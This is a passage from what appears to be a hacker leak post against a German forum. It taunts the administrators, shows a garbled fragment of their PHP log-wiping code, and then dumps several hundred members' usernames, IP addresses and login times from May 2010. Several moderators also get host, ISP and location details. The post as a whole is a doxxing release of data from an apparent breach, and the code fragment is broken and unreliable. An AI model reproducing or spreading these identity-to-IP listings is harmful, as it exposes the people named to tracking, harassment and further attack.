might think. Sure, some of you maybe always used a +proxy... Most of the administrators and moderators didn't. Did you? + +>>>ATTENTION! RETARDED PHP CODE ALERT!<<< + +~$ cat checkit.php += 2 OR CHAR_LENGTH(member_ip2) >= 2"); +?> + +This is how they wipe their logs. Sweet huh? + +-=[ THANAT0S + [ IP: 93.131.107.168 used at 11. May,2010,22:31:47 + [ HOST: wprt-5d836ba8.pool.mediaWays.net + [ LOCATION: DE, Germany + [ ISP: 1&1 Internet AG Wuppertal, 07 - ]=- + +-=[ KRON0S + [ IP: 80.226.14.32 used at 11.May,2010,23:32:47 + [ HOST: ip-80-226-14-32.vodafone-net.de + [ LOCATION: DE, Germany + [ ISP: Vodafone D2 GmbH + [ - + [ IP: 79.221.31.254 used at 11. May,2010,22:16:31 + [ HOST: p4FDD1FFE.dip.t-dialin.net + [ LOCATION: DE, Germany + [ ISP: Deutsche Telekom AG Frankfurt Am Main, 05 - ]=- + +-=[ Zagerus + [ IP: 62.227.86.213 used at 11. May,2010,23:37:27 + [ HOST: p3EE356D5.dip.t-dialin.net + [ LOCATION: DE, Germany + [ ISP: Deutsche Telekom AG Hesel, 06 - ]=- + +And here are some others. If you are not in, you are lucky dude. + +8:Moq:88.76.175.97:11.May,2010,17:44:47 +9:cyberhood:95.223.48.207:12.May,2010,01:46:56 +19:Sauberfee:92.117.112.201:12.May,2010,10:42:58 +24:Hamtaro:79.192.43.222:11.May,2010,18:35:40 +72:saxxe:79.229.16.123:11.May,2010,21:11:28 +75:xStream:93.222.120.193:11.May,2010,16:44:08 +100:cactus:87.179.199.207:11.May,2010,21:23:25 +128:Everglades:95.113.18.231:11.May,2010,18:00:07 +268:Raider:92.106.51.188:11.May,2010,18:27:23 +279:Fuad2005:92.138.138.197:11.May,2010,23:10:06 +296:mama12:41.218.195.24:12.May,2010,11:45:51 +342:K1ng:85.106.184.41:11.May,2010,19:18:24 +419:NoName:92.224.32.103:11.May,2010,23:03:01 +442:falsch:178.3.16.217:11.May,2010,19:35:56 +508:leks77:212.117.183.231:12.May,2010,10:29:03 +539:Totila:93.202.54.103:11.May,2010,16:51:33 +697:Voided:82.215.36.178:12.May,2010,05:43:08 +701:THC2k9:92.241.168.90:11.May,2010,17:44:15 +757:Benelli:92.224.73.140:11.May,2010,23:24:22 +760:Ra-Re:87.180.96.87:11.May,2010,20:03:01 +792:Klassenkampf:92.241.168.24:11.May,2010,17:32:34 +804:Cakal:80.138.119.102:11.May,2010,19:01:25 +806:DonVito:109.91.29.106:12.May,2010,03:21:47 +866:Macacity:212.117.160.22:11.May,2010,21:54:58 +879:Korni22:80.254.73.150:11.May,2010,21:35:58 +894:r00ty:88.153.108.82:11.May,2010,21:14:31 +900:BestOfMan:109.90.76.129:11.May,2010,16:10:23 +919:patexiars:92.75.104.76:11.May,2010,22:05:42 +941:MatrixOne:88.134.115.105:11.May,2010,16:53:08 +956:J0hn.X3r:212.117.162.222:11.May,2010,20:56:20 +972:Blubber:91.16.193.18:12.May,2010,00:44:28 +988:handplant:84.174.211.193:12.May,2010,01:34:44 +1002:mirinda:194.97.132.5:12.May,2010,00:17:29 +1006:Spysoft:93.208.48.129:11.May,2010,19:29:32 +1044:pierini1:190.78.5.121:12.May,2010,04:16:20 +1059:coxxy:87.162.217.181:11.May,2010,18:45:11 +1123:o0oNEOXo0o:88.70.217.163:11.May,2010,16:29:52 +1149:Angelus:88.198.33.146:11.May,2010,18:46:20 +1153:VeXx:195.254.134.10:11.May,2010,22:13:29 +1181:Friik:95.208.33.97:11.May,2010,19:50:50 +1184:brezel:91.32.11.7:11.May,2010,20:33:39 +1219:Rasierer:94.222.108.140:11.May,2010,20:17:49 +1258:storm:82.82.50.170:11.May,2010,22:02:23 +1259:e0s:91.12.99.126:11.May,2010,16:45:27 +1261:backslash:79.217.183.173:11.May,2010,23:11:01 +1298:Snack:84.149.215.212:11.May,2010,22:50:44 +1312:Burncool:92.229.243.121:11.May,2010,20:03:38 +1354:loveme3:173.56.65.97:12.May,2010,10:49:15 +1484:cocaX:217.255.54.118:11.May,2010,20:42:45 +1487:K!w!:80.254.75.54:12.May,2010,11:39:20 +1509:stay:sic:94.216.102.214:11.May,2010,17:47:07 +1558:emulator:84.19.169.235:12.May,2010,01:23:20 +1565:waltdisney:80.226.214.128:11.May,2010,20:17:42 +1739:eTernitY:81.210.215.38:11.May,2010,17:15:51 +1759:Art!C:84.149.59.67:11.May,2010,20:28:07 +1820:xKawsx:79.212.32.88:12.May,2010,09:28:35 +1837:xeq:188.193.164.69:11.May,2010,16:24:01 +1849:alpha-one:78.55.248.148:11.May,2010,19:26:39 +1941:Blezz:77.20.37.32:11.May,2010,20:46:30 +1943:player:188.98.68.32:11.May,2010,20:25:31 +1949:TheViper:94.221.130.233:11.May,2010,20:03:19 +1959:Plasmasmog:195.254.135.84:12.May,2010,00:33:47 +1975:octavian31:188.126.88.161:11.May,2010,18:25:04 +2078:Smile:188.192.173.6:12.May,2010,01:03:48 +2130:Blackc0d3:95.116.116.29:12.May,2010,08:29:58 +2150:iNf3cT3d:178.0.8.170:11.May,2010,20:57:40 +2157:mogtarno:200.219.244.122:11.May,2010,19:13:26 +2211:Ditoran:79.217.217.184:11.May,2010,21:29:19 +2222:since85:79.203.224.130:12.May,2010,01:47:10 +2259:Gizolo:83.28.216.20:12.May,2010,07:16:57 +2260:mc_wizzard:93.209.120.111:11.May,2010,21:46:18 +2262:kingsite:95.208.98.66:11.May,2010,19:36:20 +2321:bitw0rm:213.163.71.100:11.May,2010,22:38:48 +2342:dlrange:212.117.185.116:11.May,2010,19:14:41 +2352:schultercrem:79.247.79.222:11.May,2010,22:03:46 +2377:Hexxor:78.34.175.77:11.May,2010,18:39:48 +2397:ToX:188.97.117.38:12.May,2010,02:40:53 +2430:Risking:193.105.134.54:11.May,2010,16:38:15 +2467:FaNTaCoLa:92.228.78.154:11.May,2010,20:25:52 +2499:ketamin500:87.188.191.227:12.May,2010,03:48:04 +2503:ixxten:95.211.10.25:11.May,2010,23:38:46 +2515:karma:41.214.130.116:12.May,2010,01:22:08 +2614:aliro:217.81.182.174:11.May,2010,16:11:42 +2624:kirmi:95.88.114.114:12.May,2010,03:49:42 +2630:Sinned:93.130.194.53:11.May,2010,17:05:39 +2738:c0ldice:83.65.26.115:11.May,2010,23:48:43 +2795:andr3w:92.86.134.60:11.May,2010,21:15:48 +2800:maulix:91.47.224.246:11.May,2010,19:16:41 +2808:conax:95.211.13.145:12.May,2010,01:19:14 +2834:ichwersons:92.229.86.9:11.May,2010,16:28:24 +2861:daniella:141.23.41.228:11.May,2010,19:29:46 +2904:Kuschel2007:109.91.67.5:11.May,2010,23:44:16 +2979:p0lium:92.226.214.115:11.May,2010,18:46:37 +2986:deeadj:41.131.231.213:12.May,2010,09:38:28 +3029:Coldfear:188.23.98.182:12.May,2010,09:17:54 +3096:kingtph:93.193.66.186:11.May,2010,19:24:10 +3099:Don92:91.62.44.6:12.May,2010,09:53:32 +3136:Cursed:88.117.82.251:11.May,2010,22:05:07 +3167:PaTaYa:188.108.99.234:11.May,2010,19:30:03 +3177:Letharg:194.208.220.89:11.May,2010,17:19:38 +3195:PConKey:82.212.7.203:12.May,2010,00:02:36 +3201:CHUZP3:80.139.117.65:11.May,2010,18:04:57 +3230:Brennmeister:87.175.238.66:11.May,2010,20:46:29 +3233:east0n:93.190.142.152:11.May,2010,16:46:38 +3244:wacked:79.243.167.164:11.May,2010,20:33:07 +3272:THANAT0S:93.131.107.168:11.May,2010,18:19:18 +3275:Kugelfisch:62.156.173.160:12.May,2010,07:06:32 +3291:tato1977:201.219.59.18:11.May,2010,23:51:18 +3307:Beelzemon:93.222.181.202:12.May,2010,10:48:20 +3318:fRea:93.232.8.192:11.May,2010,23:18:49 +3370:lappedudl:91.39.225.239:11.May,2010,17:53:57 +3382:newone:79.204.63.228:11.May,2010,16:54:09 +3402:Jimmykk99:91.37.96.60:12.May,2010,09:04:52 +3436:MajinCloud:85.178.43.238:11.May,2010,21:08:42 +3441:ACAB:77.178.31.65:11.May,2010,17:07:59 +3503:stryper:87.187.77.139:11.May,2010,22:04:03 +3536:m00nchile:95.211.10.25:12.May,2010,07:07:18 +3540:gamer:188.165.140.110:11.May,2010,23:43:24 +3555:b0uNz:109.90.237.36:12.May,2010,11:37:49 +3556:SYCore:85.180.82.57:11.May,2010,18:23:40 +3566:kasim:188.108.176.152:11.May,2010,21:50:08 +3581:Ch4oS:94.223.132.156:11.May,2010,18:21:40 +3595:rechman:77.191.180.22:12.May,2010,01:08:54 +3646:HiddenCell:94.220.184.248:11.May,2010,16:24:29 +3650:GunZ:95.88.213.46:12.May,2010,11:51:10 +3674:CurRy:217.150.244.116:11.May,2010,16:19:12 +3683:HaX-H:84.175.210.90:11.May,2010,16:18:58 +3688:sleepdaddy:85.249.223.55:12.May,2010,01:45:19 +3694:p0rt3m:193.171.62.115:12.May,2010,11:29:24 +3703:C4D:196.213.95.92:11.May,2010,19:36:17 +3708:dXJ1:87.167.176.177:12.May,2010,00:03:04 +3722:segseg:217.224.162.173:11.May,2010,16:29:32 +3733:quaquohd:109.203.97.102:11.May,2010,21:15:44 +3739:Mr.Pink:217.226.111.44:12.May,2010,00:50:18 +3744:th3unk0wn:173.234.116.92:11.May,2010,17:24:31 +3758:1nk:93.203.221.239:11.May,2010,22:36:17 +3801:berlin61:89.247.73.186:11.May,2010,21:52:47 +3807:Screwaholik:188.107.217.121:11.May,2010,16:10:25 +3857:Nik21465:92.224.46.8:11.May,2010,23:22:46 +3861:geili123:92.104.125.56:11.May,2010,18:38:58 +3873:star41:87.118.118.37:11.May,2010,18:14:29 +3885:fakerboy:93.182.134.126:12.May,2010,10:09:33 +3900:siN:95.211.13.145:12.May,2010,02:31:06 +3932:Agali09:217.190.254.252:11.May,2010,22:49:15 +3951:aboh:92.241.164.47:11.May,2010,21:52:56 +3977:piticu:94.222.106.139:11.May,2010,20:56:37 +3988:DannyOcean:78.52.189.128:12.May,2010,11:49:18 +4006:Billy:92.105.11.221:11.May,2010,21:20:23 +4011:And1player:78.42.21.72:11.May,2010,19:51:28 +4023:C3P0:80.139.34.109:11.May,2010,22:48:23 +4031:hundesport:87.183.205.188:11.May,2010,20:56:38 +4045:m3e92:188.105.218.163:11.May,2010,22:04:09 +4065:OrganizedCrime:84.46.40.159:11.May,2010,17:22:23 +4072:donnie:87.158.231.91:11.May,2010,17:35:27 +4089:donkrawalo:92.200.9.218:11.May,2010,23:02:42 +4098:Fuzzle:79.226.229.231:11.May,2010,20:46:00 +4100:brosis:212.150.184.108:12.May,2010,10:08:42 +4111:hotrain:80.171.167.199:12.May,2010,01:10:43 +4115:derodin:217.93.109.192:12.May,2010,06:25:27 +4117:Abartig:217.233.45.253:11.May,2010,23:25:57 +4127:Spitfir3:193.105.134.54:11.May,2010,18:59:49 +4139:next:67.205.89.146:12.May,2010,00:15:35 +4150:h4ppyh0ur:213.163.64.43:11.May,2010,21:40:11 +4153:trfs:78.61.14.103:11.May,2010,19:33:23 +4189:thesilence:125.27.18.49:11.May,2010,21:50:34 +4203:afzal12:119.153.139.246:11.May,2010,19:45:36 +4215:MR.RU:94.75.220.32:11.May,2010,16:52:09 +4240:yakisikli123:79.249.250.5:12.May,2010,01:45:02 +4255:LocaLlHorsT:84.56.214.3:11.May,2010,16:09:51 +4283:brutal14u:217.231.45.156:11.May,2010,21:48:30 +4295:nikkibeach:80.171.67.72:11.May,2010,16:47:31 +4297:ALCHIMIST:87.118.124.83:12.May,2010,03:20:44 +4337:Kuku:93.223.142.223:11.May,2010,22:54:47 +4372:kdkdkd:193.105.134.54:11.May,2010,16:28:24 +4384:sainttropez123:90.201.80.28:12.May,2010,08:09:52 +4397:Bierfass:93.232.61.219:11.May,2010,18:14:02 +4417:Southpark:95.211.13.145:11.May,2010,21:07:45 +4436:bl0b:95.172.23.82:11.May,2010,18:24:51 +4440:muruk2009:78.54.52.197:12.May,2010,04:07:42 +4442:Werk12:93.131.27.155:12.May,2010,00:20:25 +4496:Raiden:85.176.18.51:12.May,2010,11:48:30 +4502:skimmbeam:84.146.45.52:12.May,2010,07:23:10 +4504:Conflict:87.118.124.80:11.May,2010,20:18:30 +4509:kartoffelbrot:91.121.67.131:12.May,2010,01:03:48 +4530:terminiert:87.118.118.37:11.May,2010,20:35:30 +4538:JickSaw:92.226.148.27:11.May,2010,16:25:58 +4540:montione:79.192.43.39:11.May,2010,19:50:37 +4565:Basquash!:88.75.43.118:12.May,2010,00:59:05 +4571:Razade:93.232.124.85:11.May,2010,16:45:30 +4584:p5800:96.9.186.69:11.May,2010,20:39:39 +4585:mopedfahrer:84.19.169.165:11.May,2010,18:33:33 +4598:Jaksa:217.150.244.116:11.May,2010,21:23:47 +4609:mastercrewster:88.69.191.161:11.May,2010,20:00:15 +4636:passionnight:79.221.31.254:11.May,2010,22:11:53 +4645:Salax:91.50.206.23:12.May,2010,01:01:23 +4648:blackbot:89.27.221.94:11.May,2010,18:21:06 +4658:troubleinaz:70.103.96.30:11.May,2010,19:58:26 +4660:softis:84.171.54.57:11.May,2010,21:30:13 +4662:makko:95.211.13.145:11.May,2010,21:45:52 +4727:KenZoo:82.113.121.248:12.May,2010,11:03:41 +4736:r00t_cr4cK:88.78.64.46:12.May,2010,03:11:15 +4759:Alpha21:84.137.85.196:11.May,2010,21:03:06 +4782:angeldust:93.223.85.66:11.May,2010,21:09:48 +4788:Batman:93.197.186.217:12.May,2010,11:44:47 +4825:xzerox:79.216.218.4:11.May,2010,23:08:54 +4846:Orifice:93.111.88.46:11.May,2010,20:14:33 +4851:warkid:91.23.109.120:11.May,2010,16:40:22 +4861:herzlungeniere:93.222.177.212:11.May,2010,17:37:45 +4873:teetuete:80.139.3.93:11.May,2010,17:02:58 +4893:hexad.:88.69.188.137:11.May,2010,19:06:35 +4904:gf0x:88.66.3.216:12.May,2010,00:05:11 +4917:Agent.Bitch:84.23.73.194:11.May,2010,16:11:34 +4932:rio221982:125.60.252.162:11.May,2010,17:47:56 +4951:binglly:194.29.239.80:11.May,2010,17:27:57 +4967:K34nu:93.231.171.132:11.May,2010,19:57:21 +4981:ZEL0S:217.236.196.136:11.May,2010,20:28:35 +4982:webmoney:87.118.120.182:11.May,2010,16:10:28 +5017:oC-xRaY:217.224.223.57:11.May,2010,18:12:29 +5047:Phamo:77.189.51.242:11.May,2010,18:19:59 +5052:Glain:79.198.140.239:11.May,2010,17:37:01 +5053:Kettey:95.211.13.145:11.May,2010,22:18:44 +5085:iShorty:84.61.0.221:12.May,2010,00:32:12 +5091:Alucart:141.41.237.214:12.May,2010,11:41:09 +5157:tryit:95.118.173.199:11.May,2010,20:40:26 +5161:crazzu:91.3.90.70:12.May,2010,07:23:55 +5192:shorty23:91.115.157.57:11.May,2010,22:25:02 +5238:Cornelsen:87.178.172.235:11.May,2010,16:30:35 +5249:laengst:84.170.115.56:11.May,2010,17:52:42 +5297:slyzer:91.96.79.27:11.May,2010,23:13:04 +5333:klex:92.230.137.54:12.May,2010,10:16:56 +5338:pulseofminorit:79.236.113.134:11.May,2010,18:04:59 +5393:magichans:80.144.122.11:12.May,2010,02:17:32 +5400:bhk:195.254.135.84:12.May,2010,09:19:13 +5413:Seller80:77.185.24.40:11.May,2010,21:43:21 +5422:s4pPh!r3:87.160.0.84:11.May,2010,21:34:35 +5443:Hacko1945:79.192.177.208:11.May,2010,16:11:41 +5481:Klempner:93.128.79.112:11.May,2010,19:32:46 +5502:DocMorris:91.52.177.252:12.May,2010,07:05:48 +5509:marrs1:82.113.106.218:11.May,2010,18:07:23 +5511:sliver:82.113.121.149:12.May,2010,06:48:09 +5534:coco20:80.254.73.146:11.May,2010,23:59:20 +5535:PS-Freak-Ger:217.150.241.142:12.May,2010,02:33:05 +5567:al.mighty:77.180.60.69:11.May,2010,20:46:59 +5612:Killer:87.150.196.234:12.May,2010,11:12:38 +5616:Senfi:188.60.135.103:11.May,2010,23:10:40 +5617:br0k.:88.153.224.250:12.May,2010,11:53:28 +5618:zissel:80.254.74.157:12.May,2010,08:25:10 +5627:trashy:91.40.51.47:11.May,2010,23:30:12 +5629:killahprogamer:84.145.57.66:11.May,2010,19:18:02 +5639:superman123456:213.211.231.59:11.May,2010,17:23:28 +5640:F1R4T:85.127.212.124:11.May,2010,23:08:54 +5644:Johnzen84:82.113.106.222:11.May,2010,17:02:02 +5649:Kuh:77.186.9.68:11.May,2010,23:08:11 +5650:heisenberg:85.249.223.55:11.May,2010,18:07:29 +5661:xoor:94.220.58.249:11.May,2010,22:50:23 +5670:ciwan:84.46.26.163:11.May,2010,23:29:22 +5693:chrissss:188.193.7.189:11.May,2010,16:35:01 +5697:danielitt0:190.41.153.216:12.May,2010,06:40:59 +5702:3oo1:217.150.241.142:12.May,2010,03:39:23 +5703:Ayran:78.35.204.165:12.May,2010,09:50:49 +5712:Kaiser911:92.241.168.90:12.May,2010,08:15:47 +5720:DrKrabbe:89.14.103.157:12.May,2010,11:11:02 +5730:SUPERIOR:91.60.152.209:11.May,2010,19:14:29 +5737:Bit3:213.163.72.149:11.May,2010,16:46:31 +5751:pwnedn00b:91.21.234.121:11.May,2010,19:01:06 +5760:Emok:91.52.177.252:12.May,2010,01:06:40 +5771:moritz100:82.83.50.27:12.May,2010,11:06:40 +5788:bjoerni:92.193.21.11:12.May,2010,01:09:18 +5791:random:93.220.52.34:12.May,2010,11:23:22 +5793:PallMall:80.187.106.25:11.May,2010,21:17:48 +5800:peppi200:84.182.241.122:11.May,2010,17:30:48 +5812:DarkManX:217.226.87.28:12.May,2010,00:01:26 +5816:phantom:87.178.125.85:12.May,2010,09:05:16 +5839:Deus2210:86.56.58.132:12.May,2010,08:09:58 +5847:terminatoor:82.82.208.95:11.May,2010,17:45:01 +5848:dergeldmacher:80.171.112.131:12.May,2010,00:58:00 +5864:Cappo:212.117.162.192:11.May,2010,22:15:11 +5877:BEKO41:88.75.215.221:11.May,2010,20:50:04 +5892:Braincerz:217.23.6.162:11.May,2010,17:02:29 +5907:MistaMicha:89.182.67.114:11.May,2010,21:02:20 +5911:ceuiz:93.202.93.142:11.May,2010,19:09:34 +5918:skull-man:212.117.185.116:11.May,2010,21:11:06 +5954:Fr34k:109.90.174.80:11.May,2010,16:51:05 +5960:Sianzo:91.58.83.223:11.May,2010,18:50:04 +5968:sedriss:77.188.219.70:11.May,2010,22:41:57 +5969:only-fresh:93.212.241.146:11.May,2010,23:48:52 +5971:jackl:88.78.154.210:11.May,2010,22:24:19 +5983:Terrible:84.136.209.100:11.May,2010,22:15:03 +5984:HijackThis:87.152.23.195:11.May,2010,20:01:31 +6011:Ikarus:95.88.181.139:12.May,2010,10:44:34 +6030:InfectedXES:80.171.167.199:11.May,2010,22:50:58 +6032:johnnymotor:87.159.19.84:12.May,2010,09:54:00 +6038:niceOne:62.143.58.92:11.May,2010,16:25:22 +6043:Kolera:93.206.174.209:11.May,2010,19:18:32 +6045:Prime:88.76.134.80:11.May,2010,21:08:36 +6054:T-Slide:212.117.162.192:11.May,2010,22:30:52 +6079:glow_316:79.232.239.129:12.May,2010,10:54:51 +6082:marcinator:92.193.115.242:12.May,2010,11:34:14 +6086:Ketchup:193.105.134.54:11.May,2010,22:45:12 +6088:Striker:80.254.74.171:11.May,2010,16:30:30 +6096:Spyterm:77.8.69.131:12.May,2010,11:32:25 +6101:FroschKanone:80.144.73.205:11.May,2010,17:01:12 +6114:Kotek:93.133.49.40:12.May,2010,11:31:38 +6119:KING_TURKEY:188.107.232.151:11.May,2010,19:46:58 +6120:Sewolfian:89.246.202.212:12.May,2010,10:33:21 +6150:Jack:95.33.122.92:11.May,2010,20:47:37 +6154:Jonko:87.245.49.176:11.May,2010,16:38:05 +6170:Redox:92.117.238.200:11.May,2010,19:41:55 +6171:TamCore:93.223.170.144:11.May,2010,19:59:45 +6194:Manu:188.60.139.149:11.May,2010,18:31:26 +6214:Ch0PPeR:93.133.234.97:11.May,2010,16:28:58 +6215:krause515:84.186.177.197:11.May,2010,19:02:52 +6216:turb0julz:91.54.192.9:12.May,2010,00:50:49 +6219:Firehacker:84.63.148.132:11.May,2010,18:59:35 +6227:pak:188.99.84.251:11.May,2010,21:19:19 +6268:0ptik:217.227.231.172:11.May,2010,16:56:01 +6271:Poinger:217.93.215.234:11.May,2010,17:23:01 +6272:stoli:217.150.244.116:11.May,2010,21:57:11 +6273:Jibbertripo:84.19.169.168:11.May,2010,20:59:53 +6341:d-signed:81.173.130.66:11.May,2010,23:59:06 +6362:Za:94.219.61.120:11.May,2010,16:28:35 +6370:pukker:217.88.220.75:11.May,2010,22:51:44 +6371:theex:188.194.206.85:11.May,2010,17:13:42 +6374:hack0r:88.134.70.165:12.May,2010,02:31:27 +6375:PsychoXx:89.15.148.139:12.May,2010,01:03:54 +6403:bam138:87.163.213.153:12.May,2010,02:18:06 +6408:dammed_Dammer:84.173.177.8:12.May,2010,07:42:03 +6417:BiGBiLL:193.105.134.54:12.May,2010,09:11:57 +6428:angelstorm:94.219.76.244:11.May,2010,17:49:42 +6430:Mr.Verballert:92.241.164.47:12.May,2010,06:51:25 +6448:P5N:109.193.76.3:11.May,2010,23:27:43 +6461:Six_By_Seven:84.175.206.176:11.May,2010,18:56:59 +6474:energieee:91.176.160.168:12.May,2010,11:09:56 +6478:yavsak:88.73.96.46:11.May,2010,16:26:03 +6510:Cobray:88.68.116.147:11.May,2010,18:47:50 +6517:Drop:95.90.164.82:11.May,2010,22:56:40 +6520:Stoertebeker:194.97.132.5:12.May,2010,01:12:46 +6530:Boglu55:195.254.134.10:12.May,2010,11:39:29 +6551:levision:80.187.102.37:12.May,2010,10:02:24 +6564:123456789:93.132.132.239:11.May,2010,20:19:11 +6565:swsbk:78.54.18.222:12.May,2010,05:55:11 +6574:jensmaul:84.23.73.194:11.May,2010,21:36:03 +6578:Dr.Somm3r:93.213.16.117:11.May,2010,19:29:33 +6588:hOuse:78.54.231.64:11.May,2010,21:46:49 +6623:sp0t:77.58.138.129:11.May,2010,22:55:51 +6630:KoKaiiN:188.107.248.221:11.May,2010,17:05:27 +6632:KiiNGDeZz:95.211.13.145:11.May,2010,21:44:35 +6645:puRe:91.36.207.94:11.May,2010,19:12:34 +6671:BlackCobra:92.73.99.159:11.May,2010,22:28:40 +6700:Stinger:91.96.40.71:11.May,2010,16:13:33 +6729:Wounder:88.74.103.193:11.May,2010,21:06:05 +6733:heugabel:87.158.119.13:11.May,2010,19:38:42 +6743:Shade:91.61.12.29:12.May,2010,10:50:13 +6763:iceman305:79.226.237.139:11.May,2010,19:51:12 +6773:dnsHF:87.245.55.189:11.May,2010,18:34:26 +6782:zidan369:92.225.239.200:11.May,2010,20:46:55 +6794:pe%ep:210.182.113.8:11.May,2010,18:30:12 +6820:xEAM:93.220.119.200:11.May,2010,23:53:15 +6833:Darkrain:217.23.6.162:11.May,2010,20:16:06 +6835:PEZ3r0:79.192.27.65:12.May,2010,10:57:48 +6849:Authentisch:79.226.248.38:11.May,2010,16:59:43 +6852:Suppenhorst:84.186.100.193:11.May,2010,22:38:18 +6854:scriptX:217.72.216.101:11.May,2010,19:59:32 +6874:bebbo:93.104.139.210:11.May,2010,21:26:13 +6913:Swich:86.103.215.160:11.May,2010,17:08:07 +6919:wolax:217.238.72.219:11.May,2010,18:06:20 +6937:haege:92.241.164.47:11.May,2010,18:46:32 +6955:n0va:188.109.216.119:11.May,2010,19:29:16 +6963:Spec1al:93.211.134.29:11.May,2010,17:18:50 +6970:Der1Pate:85.177.144.71:12.May,2010,02:38:53 +6973:afakename:87.118.124.80:12.May,2010,10:36:09 +6974:jungleboy66:95.208.138.237:11.May,2010,17:02:19 +6975:reflex:87.172.8.235:11.May,2010,20:19:09 +6977:lucker445:68.62.7.212:12.May,2010,04:39:04 +6996:stanzzky:88.76.245.67:11.May,2010,16:10:29 +7003:SoL1sT:88.73.120.100:12.May,2010,00:47:33 +7008:Milkman:92.241.168.24:11.May,2010,16:25:41 +7011:Mass:79.198.109.76:11.May,2010,20:59:33 +7018:DragN:80.171.209.4:11.May,2010,20:43:58 +7043:psycho_ak:79.221.31.254:11.May,2010,21:36:22 +7050:h04x:80.134.83.156:11.May,2010,20:32:05 +7087:necro:92.77.149.43:11.May,2010,16:15:19 +7097:bennu:78.49.169.154:11.May,2010,18:05:47 +7101:_ring:109.192.53.209:11.May,2010,22:58:42 +7123:Dr.Gr33nthumb:84.161.161.32:11.May,2010,18:52:07 +7139:Bandito:78.49.37.129:11.May,2010,22:25:06 +7145:and1:109.192.150.81:11.May,2010,23:41:36 +7165:YAMAMOTO:85.22.96.208:11.May,2010,22:00:08 +7171:131337:193.22.73.199:12.May,2010,11:50:37 +7179:skysurfer:93.206.163.21:11.May,2010,23:05:07 +7188:H3alth:91.42.242.166:11.May,2010,18:07:03 +7193:david_osiris:84.112.180.196:11.May,2010,22:30:24 +7194:xam4:93.209.202.75:11.May,2010,16:31:42 +7195:shunkweed:77.20.193.181:11.May,2010,19:54:01 +7199:PyTh@n:85.176.135.169:12.May,2010,00:38:55 +7208:SpeedyGamer:95.208.206.17:11.May,2010,20:50:36 +7219:Kaho:78.94.30.88:11.May,2010,16:23:38 +7223:timbobimbo:88.217.125.89:12.May,2010,10:06:43 +7250:KezZza:212.117.185.116:11.May,2010,19:26:48 +7254:det0x:188.109.240.137:11.May,2010,21:51:04 +7274:KRAT0S:79.238.191.70:11.May,2010,20:41:51 +7276:R3vo:78.48.79.125:12.May,2010,00:37:44 +7281:TA4G:41.96.36.87:11.May,2010,20:11:52 +7283:N3Cr0N:92.241.164.47:11.May,2010,16:58:25 +7297:aliadso:80.146.43.131:12.May,2010,07:17:44 +7317:Sony92:91.4.41.80:11.May,2010,20:19:46 +7318:polinger:95.91.245.51:12.May,2010,05:03:46 +7356:masterblade01:94.222.224.235:12.May,2010,00:35:29 +7363:stricher:109.42.16.127:12.May,2010,00:08:15 +7374:RaZ0r2k7:93.204.151.124:11.May,2010,17:13:06 +7378:ForrestGriffin:91.20.235.58:11.May,2010,20:00:24 +7381:Shuffle:93.195.145.125:11.May,2010,20:32:23 +7386:Denzo:92.194.59.116:11.May,2010,22:46:32 +7387:Snatch:87.78.168.127:12.May,2010,10:58:11 +7388:Nightsaber:91.22.224.238:11.May,2010,18:53:42 +7394:Jigga666:87.122.239.222:11.May,2010,21:28:46 +7412:Scorpion124:91.63.103.216:11.May,2010,20:39:36 +7416:0010110101001:91.66.42.112:12.May,2010,02:36:56 +7420:hunker_joe:93.219.166.11:11.May,2010,19:54:57 +7422:Stengel94:79.217.5.246:11.May,2010,17:22:59 +7443:Mr_!CE:77.22.76.68:11.May,2010,22:38:27 +7468:knight:77.20.88.30:11.May,2010,19:14:27 +7472:Opxes:91.113.82.103:11.May,2010,19:36:18 +7484:mabo:84.167.181.250:11.May,2010,21:57:51 +7494:smokie101:81.210.161.222:11.May,2010,23:32:44 +7508:J_Bunny:88.70.75.54:11.May,2010,20:32:46 +7519:yes-Yes_y0w:84.58.139.64:11.May,2010,22:24:16 +7521:Solaro:91.37.247.33:11.May,2010,19:05:11 +7530:Socks-Service:92.241.164.47:12.May,2010,01:32:19 +7533:lololol:91.37.19.135:11.May,2010,18:36:31 +7542:Reto:91.165.4.21:11.May,2010,18:50:53 +7565:iMMorTaL:77.9.31.162:11.May,2010,22:06:22 +7590:Nobodz:84.178.74.203:11.May,2010,20:52:09 +7593:metalzare:94.134.23.148:11.May,2010,21:41:21 +7601:moveinsilence:188.106.88.198:11.May,2010,20:42:58 +7619:welovecarders:79.226.160.65:11.May,2010,17:55:04 +7626:Eldowow:93.213.113.254:11.May,2010,16:41:45 +7628:mathiasgoletz:82.113.121.219:11.May,2010,16:24:46 +7632:DerAnfänger:80.67.14.150:11.May,2010,23:33:06 +7638:lowl:87.122.59.14:11.May,2010,22:31:45 +7646:H1xx3r:87.106.83.145:11.May,2010,16:21:09 +7669:raz0RRR:80.143.46.218:11.May,2010,17:32:01 +7670:ViD:93.103.173.251:11.May,2010,20:15:55 +7673:petipenner:92.105.188.150:12.May,2010,08:07:18 +7704:Ricardiazzz:80.171.167.199:12.May,2010,03:25:57 +7715:ivenom:93.104.120.254:11.May,2010,20:54:11 +7716:Eiskalt:95.222.54.20:12.May,2010,01:29:00 +7722:heavygun:79.238.9.64:12.May,2010,09:17:53 +7727:hansdieter13:87.147.121.41:11.May,2010,18:21:47 +7737:furkan2010:84.226.241.215:11.May,2010,18:50:34 +7742:N-Skyline:222.73.19.174:11.May,2010,17:44:34 +7745:KoB24:188.107.236.4:11.May,2010,21:49:03 +7750:panno:93.204.148.62:11.May,2010,17:37:43 +7757:apochi:77.185.36.121:11.May,2010,22:14:21 +7769:kRoWneD:92.227.192.28:11.May,2010,21:03:53 +7788:Logitech:193.247.250.17:11.May,2010,16:54:08 +7793:impaleD:79.233.199.161:11.May,2010,17:50:28 +7813:paschka:188.194.98.185:11.May,2010,20:39:30 +7827:casali:92.226.122.164:12.May,2010,06:20:45 +7896:dncey0:79.241.106.21:12.May,2010,10:35:15 +7915:Nehgative:78.50.29.173:11.May,2010,19:38:57 +7916:mario_1989:91.113.3.211:12.May,2010,10:43:45 +7917:necory:217.224.237.206:11.May,2010,19:18:14 +7926:reQuire:92.252.112.124:12.May,2010,06:53:14 +7935:scoz:217.234.62.51:11.May,2010,20:35:21 +7936:metalwarlock:77.189.42.161:11.May,2010,22:11:20 +7948:yatko:217.85.57.18:11.May,2010,21:42:30 +7957:Masterofdisast:91.8.95.48:11.May,2010,21:48:16 +7972:darknuts:217.226.158.241:12.May,2010,00:32:20 +7991:speedfreak:84.178.80.193:11.May,2010,18:42:40 +8014:Ace:77.25.184.163:12.May,2010,09:14:33 +8024:icke101:88.73.115.241:11.May,2010,23:57:21 